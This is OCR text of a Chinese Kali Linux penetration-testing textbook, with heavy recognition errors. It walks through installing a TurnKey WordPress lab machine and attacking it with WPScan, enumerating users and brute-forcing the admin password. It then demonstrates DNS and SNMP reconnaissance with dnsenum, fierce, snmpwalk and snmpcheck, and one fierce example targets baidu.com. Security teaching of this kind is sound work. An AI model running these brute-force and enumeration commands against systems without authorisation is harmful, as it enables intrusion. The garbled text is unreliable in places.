官方 网 站 是 http:/www.turmkeylinux.org。 本 节 将 下 载 最 流行 的 WordPress Turnkey Linux 7 
行 版 。 
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3.2.1 获取 WordPress 应 用 程序 


获取 WordPress 应 用 程序 的 具体 操作 步骤 如 下 所 示 。 
C1) 在 浏览 器 中 输入 http//www.turnkeylinux.org 地 址 ， 打 开 的 界面 如 图 3.8 所 示 。 从 
该 界面 下 载 Turnkey Linux. 


^ 
TU © IA K EY v APPS v HELP v BLOG » SCREENSHOTS » TURNKEY HI 
L jf" U x 


f Log in Register Search [d 


Have you checked out the TurnKey Hub yet? Try the live demo! 


Total: 195.5 MB ($0.03/mo) Backup & Migration ——— a Cloud Servers 
Secure and easy server backups Rapidly explore and deploy 
130.6 MB to Amazon S3. Automatically Virginia (East USA) * 100+ free server apps in the 
restore servers from backups. Amazon EC2 cloud. 
Micro: $0.02/hour M 
64.9 MB . ; 
Test backups in the cloud. Only a browser required. 
Benefits — Blog 
100+ ready-to-use solutions: discover and leverage the best free software. Deploy solutions What's the best wa to do 
quickly on bare metal, virtual machines, or in the cloud. free software bounties? 
11th Apr, 2014 


software with full source code and a powerful build system. Free of TurnKey 13 critical x 


> 


| http://www.turnkeylinux.org/all 


图 3.8 Turnkey 主页 


(2) 在 该 页 面 列 出 了 许多 程序 ， 可 以 通过 回 下 滚动 鼠标 但 看 。 由 于 篇 幅 的 原因 ， 图 3.8 
只 截取 了 一 少 部 分 内 容 。 在 该 页面 中 ， 用 户 可 以 尝试 使 用 各 种 软件 查找 漏洞 ， 并 通过 工具 
对 这 些 应 用 程序 来 测试 用 户 的 技术 。 本 例 中 将 选择 测试 WwWordPress， 回 下 滚动 鼠标 可 以 看 
到 Instant Search 对 话 框 ， 如 图 3.9 所 示 。 


^ 
Specials Content management Web development Issue tracking Messaging 
Etherpad Lite Joomla 2.5 Drupal 7 ASP .NET on Apache with 
Real-time document Cutting Edge Content Content Management Mod Mono 
collaboration Management Framework Free .NET hosting 
Sahana Eden Ushahidi GitLab 
Humanitarian platform Crowdsourcing Crisis Self Hosted Git 
Information Management 
LAMP Stack Zen Cart Yii Framework XOOPS 
Web Stack (MySQL) online store PHP framework Content Management 
management system and Web Application wv 
Platform 
< > 


图 3.9 ”立即 搜索 


。S8 。 


B3 MAANAKE 


(3 六 在 该 对 话 框 中 输入 WordPress， 然 后 按 下 回 车 键 ， 将 显示 如 图 3.10 所 示 的 界面 。 


WordPress X A 


WordPress - Blog Publishing Platform 


WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web 

standards, and usability. It is one of the worlds most popular blog publishing 

applications, includes tons of powerful core functionality, extendable via literally 
hundreds of plugins, and supports full theming. 


Web development Issue tracking Messaging 


net 
e 


Specials Content management 


Etherpad Lite Joomla 2.5 Drupal 7 ASP .NET on Apache with 
Real-time document Cutting Edge Content Content Management Mod Mono 
collaboration Management Framework Free .NET hosting 
c ni ten Ties > 


图 3.10 WordPress 应 用 程序 


(4) 在 该 界面 可 以 看 到 WordPress 程序 已 经 找到 ， 此 时 单 击 WordPress-Blog Publishing 
Platform 链接 进入 下 载 页 面 ， 如 图 3.11 所 示 。 


TU R Vi K EY v APPS v HELP v BLOG » SCREENSHOTS  » TURNKEY HUB 
L X 


ALIO T 小 Login | Register Search Go} 
» Help You are here: Home » Virtual appliances » WordPress 
vApps Sis Blogging PHP Content management A Subscribe 
» Specials 
» IT Infrastructure WordPress - Blog Publishing Platform 


O+ 
Web devel t z 
Bh os ota WordPress is a state-of-the-art publishing platform with a focus on aesthetics, 
web standards, and usability. It is one of the worlds most popular blog} 


publishing applications, includes tons of powerful core functionality, extendable 


y 


Content management 


v 


Business management 


» Messaging via literally hundreds of plugins, and supports full theming. 
» Issue tracking 
» Database N 
» SDK BUILDS: 243MB VM . 220MB ISO OVF, OpenStack, OpenVZ, OpenNode, Xen (?) | Manifest & Sigs 
MEE s RUN FROM BROWSER: Deploy WordPress in minutes to the Amazon EC2 cloud 
WordPress Updates TKLDEV SOURCE: github.com/turnkeylinux-apps/wordpress (?) 
New TurnKey WordPress v 
FPR ES Stable version: 13.0 (changelog) 
< > 


图 3.11 Turkey Fa iti 


(50 在 该 界面 选择 下 载 ISO 映像 文件 。 单 击 220MB ISO 链接 ， 将 显示 如 图 3.12 所 示 
的 界面 。 


Subscribe to Security and News announcements 


Sign up to TurnKey's low-traffic announcements Email address: 
newsletter to get important security bulletins AAA E IA rM 
and updates on major new releases. 
We won't spam you. See our Privacy Policy 
In the works: dozens of new apps, 


high-security deterministic builds, clustering, Subscribe and go straight to download 


multi-app installations, better backups... Wo there 


图 3.12 设置 邮箱 地 址 
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(6 六 该 界面 提示 为 了 安全 ， 需 要 填写 一 个 邮箱 地 址 。 填 写 完 后 ， 单 击 Subscribe and go 
straight to download 按钮 ， 将 开始 下 载 Turnkey WordPress 软件 。 


3.2.2 安装 WordPress Turnkey Linux 


本 小 节 将 介绍 在 VMware Workstation 中 安装 WordPress Turnkey Linux。 关 于 VMware 
Workstation 的 使 用 ,在 第 1 章 中 已 经 详细 介绍 过 , 这 里 就 不 再 著述 ,安装 WordPress Turnkey 
Linux 的 具体 操作 步骤 如 下 所 示 。 

(1) 将 前 面 下 载 的 ISO 文件 寻 入 到 光驱 中 ,然后 局 动 此 虚拟 机 ， 将 显示 如 图 3.13 Aras 
的 界面 。 


Install to hard disk 


图 3.13 TURNKEY 初始 界面 


(2) 在 该 界面 选择 Install to hard disk 选项 ， 按 下 “ 回 车 键 ”， 将 显示 如 图 3.14 所 示 的 
界面 。 


图 3.14 选择 分 区 方法 
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《3 六 该 界面 是 选择 分 区 的 方法 。 该 系统 提供 了 三 种 方法 ， 分 别 是 使 用 整个 磁盘 并 设置 
YM、 使 用 整个 人 磁盘 和 手动 分 区 。 这 里 选择 第 一 种 ， 然 后 单 击 OK 按钮 ， 将 显示 如 图 3.15 
BARNEY Fr HI 


图 3.15 将 数据 写 入 磁盘 


(4) 该 界面 显示 了 分 区 的 信息 ， 这 里 提示 是 否 将 写 入 改变 磁盘 并 配置 LVM 呢 ? 如 果 
想 要 重新 分 配 分 区 的 话 ， 就 单 击 No 按钮 ， 否 则 单 击 Yes 按钮 。 本 例 中 单 击 Yes 按钮 ， 将 
显示 如 图 3.16 所 示 的 界面 。 


图 3.16 LVM 信息 


(5) 该 界面 显示 了 LVM 的 配置 信息 。 单 击 OK 按钮 ， 将 显示 如 图 3.17 所 示 的 界面 。 


图 3.17 使 用 引导 分 区 的 疮 组 


(6) 该 界面 提示 使 用 引导 分 区 的 卷 组 来 安装 系统 。 此 时 ， 单 击 OK 按钮 ， 将 显示 如 图 
3.18 所 示 的 界面 。 

(7) 该 界面 显示 了 伺 盘 的 分 区 表 人 信息， 此 时 提示 是 否 要 写 入 数据 。 这 里 单 击 Yes 按钮 ， 
将 显示 如 图 3.19 所 示 的 界面 。 
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图 3.18 ”磁盘 分 区 表 


图 3.19 复制 数据 到 磁盘 


(8) 该 界面 显示 了 复制 数据 的 做 盘 的 一 个 进度 。 复 制 完 后 ， 将 显示 如 图 3.20 所 示 的 
界面 。 


图 3.20 安装 GRUB 引导 


(9) 该 界面 提示 是 否 安装 GRUB 引导 加 载 程序 的 主 引导 记录 。 这 里 单 击 Yes 按钮 ， 将 
显示 如 图 3.21 所 示 的 界面 。 


图 3.21 是 和 否 重 启 系统 


(10) 该 界面 显示 WordPress Turkey Linux 已 经 安装 完成 ， 是 否 现在 重新 局 动 系统 。 
单 击 Yes 按钮 ， 将 显示 如 图 3.22 所 示 的 界面 。 

(11) 在 该 界面 为 Root 用 户 设置 一 个 密码 。 输 入 密码 后 ， 单 击 OK 按钮 ， 将 显示 如 图 
3.23 所 示 的 界面 。 
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322 Root 密码 


CMM LZ 


< OR > 


3.23 Root 确认 密码 


(12) 该 界面 要 求 再 次 为 Root 用 户 输 入 相同 的 密码 ， 单 击 OK 按钮 ， 将 显示 如 图 3.24 
所 示 的 界面 。 


3.24 MySQL 密码 


(13) 在 该 界面 为 MySQL 服务 的 Root 用 户 设 置 一 个 密码 ， 设 置 完 后 单 击 OK 按钮 ， 
将 显示 如 图 3.25 所 示 的 界面 。 


图 3.25 MySQL 确认 密码 


(14) 在 该 界面 再 次 为 MYSQL 服务 的 Root 用 户 输入 相同 的 密码 ， 然 后 单 击 OK TIL, 
将 显示 如 图 3.26 所 示 的 界面 。 


3.26 Wordpress 用 户 admin %45 
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(155 在 该 界面 要 求 为 Wordpress 的 用 户 admin 设置 一 个 密码 ， 输 入 密码 后 ， 单 击 OK 
按钮 ， 将 显示 如 图 3.27 所 示 的 界面 。 


图 3.27 Wordpress 用 户 admin 确认 密码 


(16) 在 该 界面 再 次 为 Wordpress 用 户 admin 输入 相同 的 密码 ， 然 后 单 击 OK 按钮 ， 将 
显示 如 图 3.28 所 示 的 界面 。 


<Apply> 


图 3.28 设置 邮件 地 址 


(17) 该 界面 提示 为 Wordpress 用 户 admin 设置 一 个 邮件 地 址 ， 这 里 使 用 默认 的 
admin(@example.com。 然 后 单 击 Apply 按钮 ， 将 显示 如 图 3.29 所 示 的 界面 。 


图 3.29 Initialize Hub Services 


(18) 该 界面 显示 了 初始 化 Hub 服务 信息 ， 在 该 界面 单 击 Skip 按钮 ， 将 显示 如 图 3.30 
所 示 的 界面 。 


«Install» 


3.30 Security updates 
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C19) 该 界面 提示 是 否 现在 安 闭 安全 更 新 ， 这 里 单 击 Install 按钮 ， 将 显示 如 图 3.31 所 
示 的 界面 。 


<Advanced Menu» 


图 3.31 WORDPRESS appliance services 


(20) 该 界面 显示 了 WordPress 应 用 服务 的 详细 信息 ， 如 Web 地 址 、Web shell 地 址 和 
端口 、Webmin 地 址 、PHPMyAdmin 地 址 和 端口 及 SSH/SFTP 地 址 和 端口 等 。 此 时 ， 表 明 
WordPress Turnkey Linux 就 可 以 使 用 了 。 


3.2.3 攻击 WordPress 应 用 程序 


上 一 小 节 介 绍 了 WordPress 虚拟 机 的 安 疲 。 现 在 就 可 以 局 动 WordPress 虚拟 机 , 在 Kali 
Linux 下 使 用 WPScan 攻击 它 。WPScan 是 一 个 黑 盒 安全 扫描 器 ， 它 允许 用 户 查 找 Word 
Press 安 闭 版 的 一 些 已 知 的 安全 漏洞 。 本 小 节 将 介绍 使 用 WPScan 工具 攻击 WordPress 应 用 
程序 。 

WPScan 在 Kali Linux 中 已 经 默认 安装 。 它 的 语法 格式 如 下 所 示 : 

wpscan [选项 ] [测试 ] 


利用 的 选项 如 下 所 示 。 

--update: 更 新 到 最 新 版 本 。 

--url|-u <target url»: 指定 扫描 WordPress 的 URL 统一 资源 定位 行 ) 或 域名 。 
--force |-f: 如 果 远 程 站 点 下 运行 WordPress， 强 制 WPScan 不 检查 。 

--enumerate |-e [option(s)]: 计算 。 该 参数 可 用 的 选项 有 u、u[10-20]、p、vp、ap、 
tt, t. vt 和 at。 其 中 表示 用 户 名 从 idl 到 10; u[10-20] 表 示 用 户 名 从 id10 到 20 
([] 中 的 字符 必须 写 ) ; p 表示 插件 程序 ，vp 表示 仅 漏 洞 插件 程序 ;ap 表示 所 有 插 
件 程 序 〈 可 能 需要 一 段 时 间 ) ; tt 表示 timthumbs; t 表示 主题 ，vt 表示 仅 漏 洞 主 
题 ; at 表示 所 有 主题 〈 可 能 需要 一 段 时 间 ) 。 

【实例 3-1】 使 用 WPScan 攻击 WordPress 程序 的 具体 操作 步骤 如 下 所 示 。 

(1) Æ Kali Linux F, #4 WPScan 的 帮助 信息 。 执 行 命令 如 下 所 示 : 


L 
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root@localhost:~# wpscan -h 


WordPress Security Scanner by the WPScan Team 
Version v2.2 
Sponsored by the RandomStorm Open Source Initiative 
@_WPScan_, @ethicalhack3r, @erwan_Ir, @gbrindisi, @_FireFart_ 


Help : 


Some values are settable in conf/browser.conf.json : 
user-agent, proxy, proxy-auth, threads, cache timeout and request timeout 


m conf/browser.conf.json). 

--basic-auth <username:password> Set the HTTP Basic authentication 

--wordlist | -w <wordlist> Supply a wordlist for the password bruter and do the brute. 

--threads | -t <number of threads> The number of threads to use when multi-threading 
requests. (will override the value from conf/browser. conf.json) 

--username | -U <username> Only brute force the supplied username. 

--help | -h This help screen. 

--verbose_ | -v Verbose output. 


Examples : 


-Further help ... 
ruby ./wpscan.rb --help 


-Do 'non-intrusive' checks ... 
ruby ./wpscan.rb --url www.example.com 


-Do wordlist password brute force on enumerated users using 50 threads ... 
ruby ./wpscan.rb --url www.example.com --wordlist darkcOde.Ist —threads 50 


-Do wordlist password brute force on the 'admin' username only ... 
ruby ./wpscan.rb --url www.example.com --wordlist darkcOde.lst --username admin 


执行 以 上 命令 后 ， 会 输出 大 量 信息 。 输 出 的 信息 中 显示 了 WPScan 的 版 本 信息 、 使 用 方法 
及 WPScan 的 例子 等 。 由 于 篇 幅 的 原因 ， 这 里 贴 了 一 部 分 内 容 ， 其 他 使 用 省 略 号 〈.…) 取代 。 

(2) 使 用 WPScan 攻击 WordPress 虚拟 机 。 本 例 中 ，WordPress 的 IP 地 址 是 
192.168.41.130。 执 行 命令 如 下 所 示 : 

root@localhost:~# wpscan -u 192.168.41.130 
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WordPress Security Scanner by the WPScan Team 
Version v2.2 
Sponsored by the RandomStorm Open Source Initiative 
@_WPScan_, @ethicalhack3r, @erwan_Ir, @gbrindisi, @_FireFart_ 


| URL: http://192.168.41.130/ 
| Started: Thu Apr 17 13:49:37 2014 


山 The WordPress 'http://192.168.41.130/readme.html' file exists 

[+] Interesting header: SERVER: Apache/2.2.22 (Debian) 

[+] Interesting header: X-POWERED-BY: PHP/5.4.4-14+deb/u8 

[+] XML-RPC Interface available under: http://192.168.41.130/xmlrpc.php 
[*] WordPress version 3.6.1 identified from meta generator 


[*] WordPress theme in use: twentythirteen v1.0 


| Name: twentythirteen v1.0 
| Location: http://192.168.41.130/wp-content/themes/twentythirteen/ 


[+] Enumerating plugins from passive detection ... 
No plugins found 


[+] Finished: Thu Apr 17 13:49:41 2014 
[+] Memory used: 2.414 MB 
[+] Elapsed time: 00:00:03 


输出 的 信息 显示 了 WPScan 一 个 简单 的 攻击 过 程 。 
(3) 列 出 用 户 名 列表 ， 执 行 命令 如 下 所 示 : 
root@localhost:~# wpscan -u 192.168.41.130 -e u vp 


\ \ ES po 
A oar ome > EET DE 
WO 


Ve ie ee eee 


WordPress Security Scanner by the WPScan Team 
Version v2.2 
Sponsored by the RandomStorm Open Source Initiative 
@_WPScan_, @ethicalhack3r, @erwan_Ir, @gbrindisi, @_FireFart_ 


| URL: http://192.168.41.130/ 
| Started: Thu Apr 17 13:50:49 2014 


[!] The WordPress 'http://192.168.41.130/readme.html' file exists 

[+] Interesting header: SERVER: Apache/2.2.22 (Debian) 

[+] Interesting header: X-POWERED-BY: PHP/5.4.4-14+deb/u8 

[+] XML-RPC Interface available under: http://192.168.41.130/xmlrpc.php 
[*] WordPress version 3.6.1 identified from meta generator 


[*] WordPress theme in use: twentythirteen v1.0 


| Name: twentythirteen v1.0 
| Location: http://192.168.41.130/wp-content/themes/twentythirteen/ 
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[+] Enumerating plugins from passive detection ... 
No plugins found 


[+] Enumerating usernames ... 


[+] We found the following 1 user/s: 
——— ee 


| Id | Login| Name | 
: c s 
|1 |admin | admin | 
Topo pour 


[*] Finished: Thu Apr 17 13:50:54 2014 

[+] Memory used: 2.379 MB 

[*] Elapsed time: 00:00:04 

从 输出 的 信息 中 可 以 看 到 当前 系统 中 只 有 一 个 用 户 ， 名 为 admin。 

(4) 为 WPScan 指定 一 个 wordlist 文件 ， 使 用 --wordlist <path to file> 选 项 。 执 行 命令 如 
下 所 示 : 


root@localhost:~# wpscan -u 192.168.41.130 -e u --wordlist /root/ wordlist.txt 


AN ^ E C —— 
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WordPress Security Scanner by the WPScan Team 
Version v2.2 
Sponsored by the RandomStorm Open Source Initiative 
@ _WPScan_, @ethicalhack3r, @erwan_Ir, @gbrindisi, (9 FireFart 


| URL: http://192.168.41.130/ 
| Started: Thu Apr 17 13:54:51 2014 


[!] The WordPress 'http://192.168.41.130/readme.html' file exists 

[+] Interesting header: SERVER: Apache/2.2.22 (Debian) 

[+] Interesting header: X-POWERED-BY: PHP/5.4.4-14+deb/u8 

[+] XML-RPC Interface available under: http://192.168.41.130/xmlrpc.php 
[+] WordPress version 3.6.1 identified from meta generator 


[+] WordPress theme in use: twentythirteen v1.0 


| Name: twentythirteen v1.0 
| Location: http://192.168.41.130/wp-content/themes/twentythirteen/ 


[+] Enumerating plugins from passive detection ... 
No plugins found 


[+] Enumerating usernames ... 

[+] We found the following 1 user/s: 
+----+-------+-------+ 
| Id | Login| Name | 
ee, pol 
|1 | admin | admin | 
+----+-------+-------+ 
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[+] Starting the password brute forcer 
Brute Forcing admin Time: 00:00:00 < > (59 / 20575) 0.28% 
ETA: 00:00:00 
[SUCCESS] Login : admin Password : 123456 


+----+-------+-------+----------+ 
| Id | Login | Name | Password | 
Tell ql gl 
|1 |admin| admin| 123456 | 
ea eee. 


[+] Finished: Thu Apr 17 13:54:56 2014 
[+] Memory used: 2.508 MB 
[+] Elapsed time: 00:00:05 


从 输出 的 信息 中 ， 可 以 看 到 WordPress 用 户 admin 的 密码 已 被 破 解 出 。 
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#45 信息 收集 


渗透 测试 最 重要 的 阶段 之 一 就 是 信息 收集 。 为 了 局 动 渗透 测试 ， 用 户 需 要 收集 关于 目 
标 主 机 的 基本 信息 。 用 户 得 到 的 信息 越 多 ， 渗 透 测试 成 功 的 概率 也 就 越 蜗 。Kali Linux $ 
作 系 统 上 提供 了 一 些 工具 ， 可 以 帮助 用 户 整 理 和 组 织 目 标 主机 的 数据 ， 使 用 户 得 到 更 好 的 
后 期 侦察 。 本 章 将 介绍 Maltego、CaseFile 和 Nmap 工具 的 使 用 其 主要 知识 点 如 下 : 
枚 举 服 务 ; 
测试 网 络 范围 ; 
识别 活跃 的 主机 和 查看 打开 的 端口 ; 
系统 指纹 识别 ; 
服务 指纹 识别 ; 
其 他 信息 收集 手段; 
使 用 Maltego 收集 信息 ; 
绘制 网 络 图 。 


OOOOUOUDD 


41 JR HR 4 


枚 举 是 一 类 程序 ， 它 允许 用 户 从 一 个 网 络 中 收集 茶 一 类 的 所 有 相关 信息 。 本 节 将 介绍 
DNS 枚 誉 和 SNMP 枚 举 技术 。DNS 枚 举 可 以 收集 本 地 所 有 DNS 服务 和 相关 条 上 日 。DNS 
枚 举 可 以 帮助 用 户 收 集 目标 组 织 的 关键 信息 ， 如 用 户 名 、 计 算 机 名 和 IP 地 址 等 ， 为 了 获取 
这 些 信 息 ， 用 户 可 以 使 用 DNSenum 工具 。 要 进行 SNMP 枚 举 ， 用 户 需 要 使 用 SnmpEnum 
工具 。SnmpEnum 是 一 个 强大 的 SNMP 枚 举 工 具 , 它 允 许 用 户 分 析 一 个 网 络 内 SNMP 信息 
传输 。 


4.1.1 DNS 枚 举 工 具 DNSenum 


DNSenum 是 一 于 非常 强大 的 域名 信息 收集 工具 。 它 能 够 通过 谷歌 或 者 字典 文件 狂 测 可 
能 存在 的 域名 ， 并 对 一 个 网 段 进行 反 回 查询 。 它 不 仅 可 以 碍 询 网 站 的 主机 地 址 信息 、 域 名 
服务 左 和 邮件 交换 记录 ， 还 可 以 在 域名 服务 左上 执行 axfr 请 求 ， 然 后 通过 谷歌 脚本 得 到 扩 
展 域名 信息 ， 提 取 子 域名 并 查询 ， 最 后 计算 C 类 地 址 并 执行 whois 查询 ， 执 行 反问 查询 ， 
把 地 址 段 写 入 文件 。 本 小 节 将 介绍 使 用 DNSenum 工具 检查 DNS 枚 举 。 在 终端 执行 如 下 所 


示 的 命令 : 


root@kali:~# dnsenum --enum benet.com 
dnsenum.pl VERSION:1.2.3 
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Warning: can't load Net::Whois::IP module, whois queries disabled. 
-----  benetcom  ----- 
Host's addresses: 


benet.com. 86400 IN A 192.168.41.131 
benet.com. 86400 IN A 127 .0.0.1 
Name Servers: 

benet.com. 86400 IN A 127 .0.0.1 
benet.com. 86400 IN A 192.168.41.131 
www.benet.com. 86400 IN A 192.168.41.131 
Mail (MX) Servers: 

mail.benet.com. 86400 IN A 192.168.41.2 


Trying Zone Transfers and getting Bind Versions: 


输出 的 信息 显示 了 DNS 服务 的 详细 信息 。 其 中 , 包括 主机 地 址 、 域 名 服务 地 址 和 邮件 
服务 地 址 。 如 果 科 运 的 话 ， 还 可 以 看 到 一 个 区 域 传 输 。 

使 用 DNSenum 工具 检查 DNS 枚 举 时 , 可 以 使 用 dnsenum 的 一 些 附 加 选项 , 如 下 所 示 。 
--threads [number]: 设置 用 户 同 时 运行 多 个 进程 数 。 
4: 人 允许 用 户 局 用 递归 查询 。 
-d: 人 允许 用 户 设置 WHOIS 请 求 之 间 时 间 延 迟 数 〈 单 位 为 秒 ) 。 
-o: 人 允许 用 户 指定 输出 位 置 。 
-w: 人 允许 用 户 局 用 WHOIS 请 求 。 


Ooooo 


4.1.2 DNS 枚 举 工 具 fierce 


fierce 工具 和 DNSenum 工具 性 质 差 不 多 ， 其 fierce 主要 是 对 子 域名 进行 扫描 和 收集 信 
BJ. EH fierce 工具 获取 一 个 目标 主机 上 所 有 IP 地址 和 主机 信息 。 执 行 命令 如 下 所 示 : 


root@kali:~# fierce -dns baidu.com 
DNS Servers for baidu.com: 
ns2.baidu.com 
ns/.baidu.com 
dns.baidu.com 
ns3.baidu.com 
ns4.baidu.com 
Trying zone transfer first... 
Testing ns2.baidu.com 
Request timed out or transfer not allowed. 
Testing ns7.baidu.com 
Request timed out or transfer not allowed. 
Testing dns.baidu.com 
Request timed out or transfer not allowed. 
Testing ns3.baidu.com 
Request timed out or transfer not allowed. 
Testing ns4.baidu.com 
Request timed out or transfer not allowed. 
Unsuccessful in zone transfer (it was worth a shot) 
Okay, trying the good old fashioned way... brute force 
Checking for wildcard DNS... 
** Found 94050052936. baidu.com at 123.125.81.12. 
** High probability of wildcard DNS. 


Now performing 2280 test(s)... 
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10.11-252.74  accounts.baidu.com 
172.22.15.16  agent.baidu.com 
180.76.3.56  antivirus.baidu.com 
10.81.7.51 ba.baidu.com 
172.18.100.200bd.baidu.com 
10.36.155.42 bh.baidu.com 
10.36.160.22  bh.baidu.com 
10.11.252.74  accounts.baidu.com 


61.135.163.0-255 : 1 hostnames found. 
61.135.165.0-255 : 1 hostnames found. 
61.135.166.0-255 : 1 hostnames found. 
61.135.185.0-255 : 1 hostnames found. 
Done with Fierce scan: http://ha.ckers.org/fierce/ 
Found 133 entries. 
Have a nice day. 


输出 的 信息 显示 了 baiducom 下 所 有 的 子 域 。 从 倒数 第 2 行 ， 可 以 看 到 总 共 找 到 133 
个 条 目 。 执 行 以 上 命令 后 ， 输 出 的 内 容 较 多 。 但 是 由 于 篇 幅 的 原因 ， 部 分 内 容 使 用 省 略 号 


用 户 也 可 以 通过 提供 一 个 单词 列表 执行 相同 的 操作 ， 执 行 命令 如 下 所 示 : 
root@kali:~# fierce -dns baidu.com -wordlist hosts .txt /tmp/output.txt 


4.14.3. SNMP 枚 举 工 具 Snmpwalk 


Snmpwalk 是 一 个 SNMP 应 用 程序 。 它 使 用 SNMP 的 GETNEXT 请 求 ， 碍 询 指定 的 所 
有 OID (SNMP 协议 中 的 对 象 标 识 ) 树 信 息 ， 并 显示 给 用 户 。 本 小 市 将 演示 Snmpwalk T. 
具 的 使 用 。 

【实例 4-1】 使 用 Snmpwalk 命令 测试 Windows 主机 。 执 行 命令 如 下 所 示 : 


root@kali:~# snmpwalk -c public 192.168.41.138 -v 2c 

iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: x86 Family 6 Model 42 Stepping 7 AT/AT 
COMPATIBLE - Software: Windows Version 6.1 (Build 7601 Multiprocessor Free)" 
1IS0.3.0:1-2.1.1.2.0 = OID: 180:3.6:'1-4.1.311.1.1.3:1.1 

iso.3.6.1.2.1.1.3.0 = Timeticks: (49046) 0:08:10.46 

iso.3.6.1.2.1.1.4.0 =" 

iso.3.6.1.2.1.1.5.0 = STRING: "WIN-RKPKQFBLG6C" 

iso.3.6.1.2.1.1.6.0 =" 

iso.3.6.1.2.1.1.7.0 = INTEGER: 76 

iso.3.6.1.2.1.2.1.0 = INTEGER: 19 

iso.3.6.1.2.1.2.2.1.1.1 = INTEGER: 1 

Eg d017122112—INIEGER:2 

iso.3.6.1.2.1.2.2.1.1.3 = INTEGER: 3 

iso.3.6.1.2.1.2.2.1.1.4 - INTEGER: 4 

S036 12122119- INTEGER: 9 

iE036127122118-INIEGER- 6 

iso.3.6.1.2.1.2.2.1.1.16 - INTEGER: 16 

iso.3.6.1.2.1.2.2.1.1.17 = INTEGER: 17 

iso.3.6.1.2.1.2.2.1.1.18 - INTEGER: 18 

iso.3.6.1.2.1.2.2.1.1.19 - INTEGER: 19 

iso.3.6.1.2.1.2.2.1.2.1 = Hex-STRING: 53 6F 66 74 77 61 72 65 20 4C 6F 6F 70 62 61 63 
6B 20 49 6E 74 65 72 66 61 63 65 20 31 00 

iso.3.6.1.2.1.2.2.1.2.2 - Hex-STRING: 57 41 4E 20 4D 69 6E 69 70 6F 72 74 20 28 53 53 
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iso.3.6.1.2.1.2.2.1.2.3 = Hex-STRING: 57 41 4E 20 4D 69 6E 69 70 6F 72 74 20 28 AC 32 

54 50 29 00 

iso.3.6.1.2.1.2.2.1.2.4 = Hex-STRING: 57 41 4E 20 4D 69 6E 69 70 6F 72 74 20 28 50 50 
iso.3.6.1.2.1.55.1.8.1.5.11.16.254.128.0.0.0.0.0.0.149.194.132.179.177.254.120.40 = INTEGER: 
1 

iso.3.6.1.2.1.55.1.8.1.5.12.16.254.128.0.0.0.0.0.0.0.0.94.254.192.168.41.138 = INTEGER: 1 
iso.3.6.1.2.1.55.1.8.1.5.13.16.32.1.0.0.157.56.106.184.52.243.8.98.63.87.214.117 = INTEGER: 1 
Iso.3.6.1.2.1.55.1.8.1.5.13.16.254.128.0.0.0.0.0.0.52.243.8.98.63.87.214.117 = INTEGER: 1 
iso.3.6.1.2.1.55.1.9.0 = Gauge32: 9 

iso.3.6.1.2.1.55.1.10.0 = Counter32: 0 


以 上 输出 的 信息 显示 了 Windows 主机 192.168.41.138 上 的 所 有 信息 。 
用 户 也 可 以 使 用 snmpwalk are BS HK TE. PUT ATS UI RATA: 
root@kali:~# snmpwalk -c public 192.168.41.138 -v 1 | grep ftp 


输 出 信息 如 下 所 示 : 
iso.3.6.1.2.1.25.4.2.1.5.3604 = STRING: "-k ftpsvc" 


输出 的 信息 表示 192.168.41.138 主机 安装 了 ftp 软件 包 。 
使 用 Snmpwalk 工具 也 可 以 枚 举目 标 主 机 上 打开 的 TCP 端口 。 执 行 命 令 如 下 所 示 : 


root@kali:~# snmpwalk -c public 192.168.41.138 -v 1 | grep tcpConnState | cut -d "." -f6 | sort -nu 
21 

25 

80 

443 


输出 信息 显示 了 192.168.41.138 主机 打开 的 端口 。 如 21. 25. 80 和 443， 总 共 打 开 了 
4 个 端口 号 。 


4.1.4 SNMP 枚 举 工 具 Snmpcheck 


Snmpcheck 工具 允许 用 户 枚 举 SNMP 设备 的 同时 将 结果 以 可 读 的 方式 输出 。 下 和 面 将 演 
示 该 工具 的 使 用 。 使 用 Snmpcheck 工具 通过 SNMP 协议 获取 192.168.41.138 主机 信息 。 执 
行 命令 如 下 所 示 : 


root@kali:~# snmpcheck -t 192.168.41.138 


该 命 令 输出 信息 较 多 ， 下 面 依次 讲解 每 个 部 分 。 首 先 输出 的 是 枚 举 运行 信息 。 


snmpcheck.pl v1.8 - SNMP enumerator 
Copyright (c) 2005-2011 by Matteo Cantoni (www.nothink.org) 


[*] Try to connect to 192.168.41.138 
[*] Connected to 192.168.41.138 
[*] Starting enumeration at 2014-04-19 15:28:58 


(1) 获取 系统 信息 ， 如 主机 名 、 操 作 系 统 类 型 及 染 构 。 结 果 如 下 所 示 : 


[*] System information 
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Hostname : WIN-RKPKQFBLG6C # 主 机 名 

Description : Hardware: x86 Family 6 Model 42 Stepping 7 AT/AT COMPATIBLE - 
Software: Windows Version 6.1 (Build 7601 Multiprocessor Free) #415 8 

Uptime system : 6 hours, 29:56.09 # 目 前 系统 开机 运行 时 间 

Uptime SNMP daemon : 25 minutes, 56.65 #SNMP 进程 运行 时 间 

Motd D- 

Domain (NT) : WORKGROUP # 计 算 机 隶属 于 


从 输出 的 信息 中 可 以 看 到 该 系统 的 主机 名 为 WIN-RKPKQFBLG6C x86 架构 和 


Windows 系统 等 信息 。 


(2) 获取 设备 信息 ， 如 设备 ID 号 、 关 型 和 状态 等 。 结 条 如 下 所 示 : 


[*] Devices information 


Id Type Status 

1 Printer Running 
10 Network Unknown 
11 Network Unknown 
12 Network Unknown 
6 Printer Running 
T Processor Running 
8 Network Unknown 
9 Network Unknown 


Description 

TP Output Gateway 
WAN Miniport (L2TP) 
WAN Miniport (PPTP) 
WAN Miniport (PPPOE) 


Microsoft Shared Fax Driver 
Intel 

Software Loopback Interface 1 
WAN Miniport (SSTP) 


以 上 信息 显示 了 该 系统 中 所 有 设备 相关 信息 ， 如 打印 设备 、 网 络 设备 和 处 理 需 等 。 
(3) 获取 存储 信息 ， 如 设备 id、 设备 类 型 和 文件 系统 撩 型 等 。 结 朱 如 下 所 示 : 


[*] Storage information 


# 设 备 ID 
# 设 备 类 型 
# 文 件 系统 类 型 


# 设 备 单元 
# 空 间 大 小 
# 已 使 用 空间 
# 剩 余 空间 


0x443a5c204c6162656c3ad0c2bcd3beed202053657269616c204e756d62657220626134643762 


0x453a5c204c61 62656c3ad0c2bcd3beed20205365726961 6c204e7/5646265/220343234383837 


AA 
Device id a 
Device type : Removable Disk 
Filesystem type : Unknown 
C:\ Label: Serial Number 3814cb70 
Device id ep 
Device type : Fixed Disk 
Filesystem type : NTFS 
Device units : 4096 
Memory size :111G 
Memory used ;: 8.5G 
Memory free : 102G 
3134 
